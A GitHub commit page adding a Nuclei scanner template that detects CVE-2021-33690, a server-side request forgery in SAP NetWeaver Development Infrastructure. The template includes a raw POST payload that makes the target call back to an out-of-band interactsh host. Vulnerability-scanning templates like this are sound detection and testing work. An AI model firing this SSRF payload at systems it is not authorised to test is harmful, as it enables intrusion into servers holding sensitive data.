Skip to content

Commit

Permalink
Merge pull request #8614 from projectdiscovery/CVE-2021-33690
Browse files Browse the repository at this point in the history
Create CVE-2021-33690.yaml (SAP NetWeaver Development Infrastructure - SSRF) 🔥
  • Loading branch information
ritikchaddha authored Nov 16, 2023
2 parents d1b75f3 + 00ba237 commit 5a26aab
Showing 1 changed file with 48 additions and 0 deletions.
48 changes: 48 additions & 0 deletions http/cves/2021/CVE-2021-33690.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,48 @@
id: CVE-2021-33690

info:
name: SAP NetWeaver Development Infrastructure - Server Side Request Forgery
author: DhiyaneshDK
severity: critical
remediation: Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
description: |
Server-Side Request Forgery (SSRF) vulnerability has been detected in the SAP NetWeaver Development Infrastructure Component Build Service versions - 7.11, 7.20, 7.30, 7.31, 7.40, 7.50The SAP NetWeaver Development Infrastructure Component Build Service allows a threat actor who has access to the server to perform proxy attacks on server by sending crafted queries. Due to this, the threat actor could completely compromise sensitive data residing on the Server and impact its availability.Note: The impact of this vulnerability depends on whether SAP NetWeaver Development Infrastructure (NWDI) runs on the intranet or internet. The CVSS score reflects the impact considering the worst-case scenario that it runs on the internet.
reference:
- https://redrays.io/cve-2021-33690-server-side-request-forgery-vulnerability/
- https://nvd.nist.gov/vuln/detail/CVE-2021-33690
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.9
cve-id: CVE-2021-33690
cwe-id: CWE-918
epss-score: 0.0011
epss-percentile: 0.4388
cpe: cpe:2.3:a:sap:netweaver_development_infrastructure:7.11:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
shodan-query: html:"SAP NetWeaver"
vendor: sap
product: netweaver_development_infrastructure
tags: cve,cve2021,oast,ssrf,sap

http:
- raw:
- |
POST /tc.CBS.Appl/tcspseudo HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
CBS=http://{{interactsh-url}}&USER=1&PWD=1&REQ_CONFIRM_DELAY=2000&ACTION=CONFIGURE
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"

- type: word
part: body
words:
- "Could not connect to the CBS"

0 comments on commit 5a26aab

Please sign in to comment.